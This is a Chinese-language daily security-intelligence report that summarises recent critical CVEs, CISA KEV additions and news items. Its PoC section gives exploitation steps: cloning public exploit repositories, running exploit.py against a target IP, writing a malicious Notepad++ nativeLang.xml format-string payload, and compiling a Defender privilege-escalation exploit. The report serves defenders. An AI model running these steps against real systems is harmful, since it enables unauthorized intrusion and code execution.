每日安全情报报告 · 2026-04-28
每日安全情报报告 · 2026-04-28
报告时间:2026-04-28 09:03 CST
覆盖周期:近 48 小时(2026-04-26 ~ 2026-04-28)
风险评级说明:🔴 严重(CVSS ≥ 9.0) | 🟠 高危(CVSS 7.0–8.9) | 🟡 中危(CVSS 4.0–6.9)
重点标注:⚡ 在野利用 | 🆘 CISA KEV | 🔓 PoC 已公开
一、最新高危漏洞
1. 🔴 CVE-2026-41409 — Apache MINA 反序列化 RCE(CVE-2024-52046 修复不完整)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-41409 |
| CVSS 评分 | 9.8(严重) |
| 漏洞类型 | 不可信数据反序列化(CWE-502) |
| 受影响组件 | Apache MINA 2.0.0 ~ 2.0.27 / 2.1.0 ~ 2.1.10 / 2.2.0 ~ 2.2.5 |
| 利用状态 | 🆘 CISA KEV 已收录 |
| 修复版本 | Apache MINA 2.0.28 / 2.1.11 / 2.2.6 |
漏洞摘要:Apache MINA 的 AbstractIoBuffer.getObject() 方法中,CVE-2024-52046 的修复方案存在严重缺陷——反序列化类名白名单的检查时机过晚,在白名单生效之前,恶意类的静态初始化块已被执行,可被利用构造完整的反序列化攻击链。攻击者无需认证、无需用户交互,通过网络发送精心构造的序列化数据即可实现 RCE。
修复建议:立即升级至对应修复版本。若无法立即升级,检查是否调用了 IoBuffer.getObject() 方法并限制网络访问。
🔗 NVD 详情 | GitHub Advisory | Apache 官方公告 | TheHackerWire 详情
2. 🔴 CVE-2026-3008 — Notepad++ 格式化字符串注入
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-3008 |
| CVSS 评分 | 6.6(中危)/ ACN 评估为 10.0 |
| 漏洞类型 | 格式化字符串注入(CWE-134) |
| 受影响组件 | Notepad++ < 8.9.4 |
| 利用状态 | 🔓 PoC 已公开(2026-04-20) |
| 修复版本 | Notepad++ 8.9.4 |
漏洞摘要:Notepad++ 的 FindInFiles 功能在解析 nativeLang.xml 配置文件时,对 find-result-hits 字段中的格式说明符(%s、%x 等)处理不当,可导致内存地址泄露(绕过 ASLR)和应用程序崩溃(DoS)。攻击者可通过钓鱼邮件分发恶意 nativeLang.xml 文件进行攻击。意大利 CSIRT-ITA(ACN)已发布高级别安全预警。
修复建议:立即升级至 Notepad++ 8.9.4;企业可通过 Sysmon 监控异常进程行为。
3. 🔴 CVE-2024-7399 — Samsung MagicINFO 9 路径遍历任意文件写入
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2024-7399 |
| CVSS 评分 | 9.8(严重) |
| 漏洞类型 | 路径遍历(CWE-22) |
| 受影响组件 | Samsung MagicINFO 9 Server < 21.1050 |
| 利用状态 | ⚡ 在野利用,🆘 CISA KEV(2026-04-24 新增) |
| 修复截止 | 2026-05-08(联邦机构强制) |
漏洞摘要:Samsung MagicINFO 9 Server 存在路径遍历漏洞,允许远程攻击者写入任意文件。CISA 已确认该漏洞正在被积极利用,并将其加入 KEV 目录。该漏洞影响数字标牌基础设施,攻击面广泛。
修复建议:立即升级至 MagicINFO 9 Server 21.1050 及以上版本。
🔗 NVD 详情 | CISA KEV 目录
4. 🔴 CVE-2024-57726 — SimpleHelp 低权限 API 密钥权限提升
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2024-57726 |
| CVSS 评分 | 9.9(严重) |
| 漏洞类型 | 缺失授权(CWE-862) |
| 受影响组件 | SimpleHelp Remote Support ≤ 5.5.7 |
| 利用状态 | ⚡ 在野利用,🆘 CISA KEV(2026-04-24 新增) |
| 修复截止 | 2026-05-08(联邦机构强制) |
漏洞摘要:SimpleHelp 远程支持软件的 API 密钥权限控制存在严重缺陷,低权限用户可获取提升的访问权限,可组合 CVE-2024-57728(路径遍历文件上传)实现完整 RCE。
修复建议:立即升级至 SimpleHelp 5.5.8 或更高版本。
🔗 NVD 详情 | CISA KEV 目录
5. 🔴 CVE-2025-29635 — D-Link DIR-823X 命令注入
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2025-29635 |
| CVSS 评分 | 高危 |
| 漏洞类型 | OS 命令注入(CWE-78) |
| 受影响组件 | D-Link DIR-823X 路由器 |
| 利用状态 | ⚡ 在野利用,🆘 CISA KEV(2026-04-24 新增) |
| 修复截止 | 2026-05-08(联邦机构强制) |
漏洞摘要:D-Link DIR-823X 路由器存在命令注入漏洞,CISA 已确认在野利用。D-Link 部分产品已 EOL,可能无补丁可用。
修复建议:如无补丁可用,考虑替换设备;限制路由器管理界面对外暴露。
🔗 NVD 详情 | CISA KEV 目录
6. 🔴 CVE-2026-34486 — Apache Tomcat 集群加密绕过 RCE
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-34486 |
| CVSS 评分 | 7.5(高危) |
| 漏洞类型 | 加密校验绕过 → 反序列化 RCE(CWE-502) |
| 受影响组件 | Apache Tomcat 11.0.20 / 10.1.53 / 9.0.116 |
| 利用状态 | 🔓 PoC 已公开(GitHub) |
漏洞摘要:Apache Tomcat 在修复 CVE-2026-29146 时引入了回归漏洞——当 Tribes 集群启用 EncryptInterceptor 时,异常处理逻辑错误导致未成功解密的集群消息仍进入后续处理流程,攻击者可向集群端口(默认 4000)发送特制报文绕过加密校验并触发反序列化 RCE。该漏洞无需认证。
修复建议:升级至 Apache Tomcat 最新版本;临时措施可限制集群通信端口的网络访问。
7. 🟠 CVE-2026-33626 — LMDeploy SSRF(AI 推理基础设施)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-33626 |
| CVSS 评分 | 7.5(高危) |
| 漏洞类型 | 服务端请求伪造(CWE-918) |
| 受影响组件 | LMDeploy(LLM 推理引擎) |
| 利用状态 | ⚡ 披露后 13 小时内即遭在野利用 |
漏洞摘要:LMDeploy 的视觉 LLM 端点存在 SSRF 漏洞,攻击者可利用其进行内部网络扫描、访问云元数据服务(如 AWS IMDSv2)。该漏洞披露后极短时间内即遭利用,凸显 AI 推理基础设施的安全脆弱性。
修复建议:立即应用 GitHub 安全公告 GHSA-6w67-hwm5-92mq 中的修复补丁。
8. 🟠 CVE-2025-59528 — Flowise AI RCE(CVSS 10.0)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2025-59528 |
| CVSS 评分 | 10.0(严重) |
| 漏洞类型 | 远程代码执行 |
| 受影响组件 | Flowise AI 平台 CustomMCP 节点 |
| 利用状态 | 大规模利用中 |
漏洞摘要:Flowise AI 平台的 CustomMCP 节点在解析用户配置时存在 RCE 漏洞,全球约 12,000+ 暴露实例受影响。该漏洞可被直接利用获取服务器完全控制权。
修复建议:立即升级至 Flowise 最新版本;限制 Flowise 实例的网络暴露。
🔗 VulnCheck 公告 | CyberSecurityNews 报道
二、CISA KEV 新增动态
CISA 4 月 24 日新增 4 个 KEV 漏洞
| CVE 编号 | 产品 | CVSS | 联邦修复截止 |
|---|---|---|---|
| CVE-2024-7399 | Samsung MagicINFO 9 Server | 9.8 | 2026-05-08 |
| CVE-2024-57726 | SimpleHelp Remote Support ≤ 5.5.7 | 9.9 | 2026-05-08 |
| CVE-2024-57728 | SimpleHelp Remote Support ≤ 5.5.7 | 7.2 | 2026-05-08 |
| CVE-2025-29635 | D-Link DIR-823X | 高危 | 2026-05-08 |
🔗 CISA KEV 官方目录 | Aviatrix 分析报告
持续活跃 KEV 漏洞(截止 4 月 28 日仍在利用中)
- CVE-2026-32201 — Microsoft SharePoint 欺骗零日(⚡ 在野利用,今日为联邦修复截止日)
- CVE-2026-33825 — Microsoft Defender BlueHammer 提权(⚡ 在野利用,PoC 已公开)
- CVE-2026-39808 — FortiSandbox 未授权命令注入 RCE(⚡ 在野利用,PoC 已公开)
- CVE-2026-35616 — FortiClient EMS 预认证 RCE(⚡ 在野利用)
- CVE-2026-34197 — Apache ActiveMQ Jolokia RCE(⚡ 在野利用)
- CVE-2023-27351 — PaperCut NG/MF 未认证 RCE(⚡ 大规模利用)
- CVE-2024-27199 — JetBrains TeamCity 路径遍历(⚡ 在野利用)
- CVE-2026-20122/20128/20133 — Cisco SD-WAN Manager(⚡ 在野利用,截止 5 月 4 日)
三、漏洞 PoC
1. Apache Tomcat CVE-2026-34486 — 集群加密绕过 RCE
PoC 来源:GitHub AirSkye 仓库
使用步骤:
# 1. 克隆 PoC 仓库
git clone https://github.com/AirSkye/CVE-2026-34486-poc.git
cd CVE-2026-34486-poc
# 2. 查看利用说明
cat README.md
# 3. 确认目标 Tomcat 集群端口(默认 4000)
# 4. 根据目标版本选择对应 payload
# 5. 执行利用(需根据 README 中的具体参数配置目标地址)
python3 exploit.py --target <TARGET_IP>:4000 --cmd "id"
注意事项:目标需启用 Tribes 集群并配置 EncryptInterceptor。本 PoC 仅限授权安全测试使用。
🔗 GitHub - AirSkye/CVE-2026-34486-poc | 腾讯云漏洞分析
2. SGLang CVE-2026-5760 — SSTI → RCE(恶意 GGUF 模型触发)
PoC 来源:GitHub Stuub 仓库
使用步骤:
# 1. 克隆 PoC 仓库
git clone https://github.com/Stuub/SGLang-0.5.9-RCE.git
cd SGLang-0.5.9-RCE
# 2. 查看利用详情
cat README.md
# 3. 准备恶意 GGUF 模型文件(包含 Jinja2 SSTI payload)
# 4. 在目标 SGLang 实例上加载恶意模型
# 5. 触发聊天模板渲染,执行任意命令
注意事项:影响 SGLang ≤ 0.5.9。恶意 GGUF 模型通过 Jinja2 聊天模板的 SSTI 实现无沙箱 RCE。仅限授权测试。
🔗 GitHub - Stuub/SGLang-0.5.9-RCE
3. Notepad++ CVE-2026-3008 — 格式化字符串注入 PoC
PoC 来源:意大利 CSIRT-ITA(ACN)安全预警 / 安全研究员公开
使用步骤:
# 1. 创建恶意 nativeLang.xml 文件
cat > nativeLang.xml << 'EOF'
<NotepadPlus>
<NativeLang>
<FindInFiles>
<find-result-hits value="AAAA%x%x%x%x%x"/>
</FindInFiles>
</NativeLang>
</NotepadPlus>
EOF
# 2. 替换 Notepad++ 安装目录下的 nativeLang.xml
# 默认路径:C:\Program Files\Notepad++\nativeLang.xml
# 或用户配置目录:%APPDATA%\Notepad++\nativeLang.xml
# 3. 启动 Notepad++ 并执行 搜索 → 在文件中查找(Ctrl+Shift+F)
# 4. 应用程序将泄露栈内存地址,可绕过 ASLR
注意事项:仅影响 Notepad++ < 8.9.4。攻击向量包括钓鱼邮件分发恶意 XML 文件。已在隔离虚拟机中验证。仅限安全研究使用。
🔗 ACN 安全预警 AL01/260427/CSIRT-ITA | Undercode Testing 分析
4. FortiSandbox CVE-2026-39808 — 未授权命令注入 RCE
PoC 来源:GitHub samu-delucas 仓库(持续活跃在野利用)
使用步骤:
# 1. 克隆 PoC 仓库
git clone https://github.com/samu-delucas/CVE-2026-39808.git
cd CVE-2026-39808
# 2. 查看利用说明
cat README.md
# 3. 设置目标 FortiSandbox 地址
export TARGET="https://<TARGET_IP>"
# 4. 执行利用(以 root 权限执行任意 OS 命令)
python3 exploit.py --target $TARGET --cmd "id"
注意事项:影响 FortiSandbox 4.4.0 ~ 4.4.8。无需认证,以 root 权限执行。修复版本:4.4.9+。CISA KEV 已收录。仅限授权渗透测试。
🔗 GitHub PoC(samu-delucas) | Fortinet 公告
5. Microsoft Defender CVE-2026-33825 — BlueHammer 本地提权
PoC 来源:独立安全研究员「Chaotic Eclipse」
使用步骤:
# 1. 获取 PoC(需搜索研究员公开的 GitHub/GitLab 仓库)
# 搜索关键词:BlueHammer CVE-2026-33825 PoC
# 2. 在受影响 Windows 系统上(需本地访问权限)
# 3. 编译利用代码
cl.exe /Fe:exploit.exe exploit.cpp
# 4. 执行提权
exploit.exe
# 利用 Windows Defender 的 TOCTOU 竞争条件
# 将普通用户权限提升至 SYSTEM
注意事项:影响 Windows 10/11 + Microsoft Defender。CVSS 7.8。已入 CISA KEV,在野积极利用。微软已于 4 月 Patch Tuesday 部分修复。仅限授权安全研究。
四、网络安全最新文章
1. Checkmarx 确认 GitHub 仓库数据被发布至暗网
来源:The Hacker News(2026-04-27)
摘要:安全代码分析平台 Checkmarx 披露,3 月 23 日供应链安全事件的后续调查显示,网络犯罪团伙(据报为 Lapsus$ 组织)已将 Checkmarx GitHub 仓库相关数据发布至暗网。Checkmarx 强调受影响仓库与客户生产环境隔离,未存储客户数据,调查仍在进行中。The Register 追加报道指出,Lapsus$ 在其泄露站点上声称获取了大量敏感信息。
🔗 阅读原文(The Hacker News) | Checkmarx 官方声明 | The Register 追踪报道
2. 73 个虚假 VS Code 扩展传递 GlassWorm v2 恶意软件
来源:The Hacker News(2026-04-27)
摘要:安全公司 Socket 在 Open VSX 仓库中发现 73 个克隆自合法软件的虚假 VS Code 扩展,与 GlassWorm v2 持久化信息窃取活动关联。这是自 2025 年 10 月以来 GlassWorm 的第四波攻击。其中 6 个确认为恶意,其余 67 个为"休眠包"——先建立信任,再通过更新推送恶意载荷。恶意扩展可跨 IDE 安装恶意软件并窃取凭证,主要针对 AI 开发者工具链。
🔗 阅读原文(The Hacker News) | Socket 研究报告 | CSA 研究笔记
3. PhantomCore 利用 TrueConf 漏洞入侵俄罗斯网络
来源:The Hacker News(2026-04-27)
摘要:Positive Technologies 报告显示,亲乌克兰黑客组织 PhantomCore 自 2025 年 9 月以来,持续利用 TrueConf 视频会议软件的三个漏洞(CVE-2025-42732、CVE-2025-42733、CVE-2025-42734)组成的攻击链,对俄罗斯境内服务器实施远程代码执行攻击,实现远程访问和横向移动。该漏洞链已于 2026 年 3 月 31 日被 Check Point Research 公开披露,并被 CISA KEV 收录。
🔗 阅读原文(The Hacker News) | CSA 复现研究 | Delimiter 详细分析
4. Claude Mythos 改变漏洞发现规则——修复速度成生存关键
来源:The Hacker News(2026-04-27)
摘要:Anthropic 发布 Claude Mythos 预览版引发安全圈广泛讨论。文章指出,AI 大规模发现漏洞能力固然令人震惊,但更隐蔽的运营问题是"发现到修复的差距"——大多数组织能否快速验证、优先排序和修复 AI 发现的大量漏洞,将成为安全运营的生死线。此前 Foresiet 报告已显示 AI 驱动攻击同比增长 89%。
5. At-Bay 2026 报告:单个勒索团伙推动近半数网络安全保险理赔
来源:Insurance Business / At-Bay(2026-04-27)
摘要:At-Bay 发布 2026 InsurSec 报告,揭示 VPN 驱动勒索攻击进入新阶段——单个勒索软件团伙利用单一防火墙品牌漏洞,已推动近 50% 的网络安全保险理赔。2025 年 VPN 相关攻击占勒索软件入侵的 73%,SonicWall SSL-VPN 成为首选目标。Akira 勒索软件是主要受益者,此前 CISA 已发出 SonicWall 大规模暴力破解预警。
🔗 阅读原文(Insurance Business) | At-Bay 官方报告
6. CTM360 揭露 GovTrap 活动:11,000+ 虚假政府门户网站
来源:The Hacker News(2026-04-27)
摘要:CTM360 曝光名为"GovTrap"的全球性活动,攻击者构建超过 11,000 个假冒政府门户网站,针对全球公民实施钓鱼诈骗。虚假网站模仿各国政府机构界面,旨在窃取公民个人信息和凭证。
7. FAST16:比 Stuxnet 早 5 年的 Lua 恶意软件框架曝光
来源:The Hacker News(2026-04-27)
摘要:安全研究发现名为"FAST16"的 Lua 恶意软件框架,最早可追溯至 2005 年——比臭名昭著的 Stuxnet 蠕虫早了整整 5 年。FAST16 主要用于针对高精度工程和物理仿真软件的数据篡改,被认为代表了"国家级行动者进行科学 sabotage"的最早案例之一。HACKMAGEDDON 的 4 月上旬攻击时间线也对此进行了收录。
🔗 阅读原文(The Hacker News) | HACKMAGEDDON 4 月攻击时间线
8. 虚假 CAPTCHA 驱动全球 IRSF 电信欺诈
来源:The Hacker News(2026-04-27)
摘要:Infoblox 披露自 2020 年 6 月持续活跃的电信欺诈活动,攻击者利用虚假 CAPTCHA 验证手段诱骗用户发送国际短信,产生高额移动账单(国际收入共享欺诈 IRSF)。与 Keitaro 流量分发平台的 120+ 活动关联,受害者单次可能被扣发往 50+ 目的地的短信费用。
五、风险趋势总结
本周安全态势关键词:AI 攻击链加速、供应链持续受击、防火墙漏洞成勒索入口
- AI 安全双刃剑:Claude Mythos 压缩漏洞发现时间至小时级,同时 AI 基础设施(LMDeploy、Flowise)自身安全脆弱
- 供应链攻击升级:GlassWorm v2 第四波(73 个 VS Code 扩展)、Lapsus$ 入侵 Checkmarx、持续蔓延的 npm/PyPI 恶意包
- VPN/防火墙成勒索首选入口:At-Bay 报告显示 SonicWall SSL-VPN 相关攻击占勒索软件入侵的 73%
- CISA KEV 持续扩充:4 月 24 日新增 4 个在野利用漏洞(Samsung、SimpleHelp、D-Link),5 月 8 日前需完成修复
- Microsoft SharePoint 零日(CVE-2026-32201):联邦修复截止日即为今日(4 月 28 日),未修复系统风险极高
免责声明:本报告仅供安全研究和信息参考之用。所有 PoC 和漏洞利用信息仅限在授权环境中进行安全测试。未经授权对他人系统进行渗透测试属于违法行为。
数据来源:NVD、CISA KEV、GitHub Advisory、The Hacker News、FreeBuf、安全客、厂商安全公告、Socket、Sysdig、CSA、At-Bay、Positive Technologies、Check Point Research 等。
更多推荐


所有评论(0)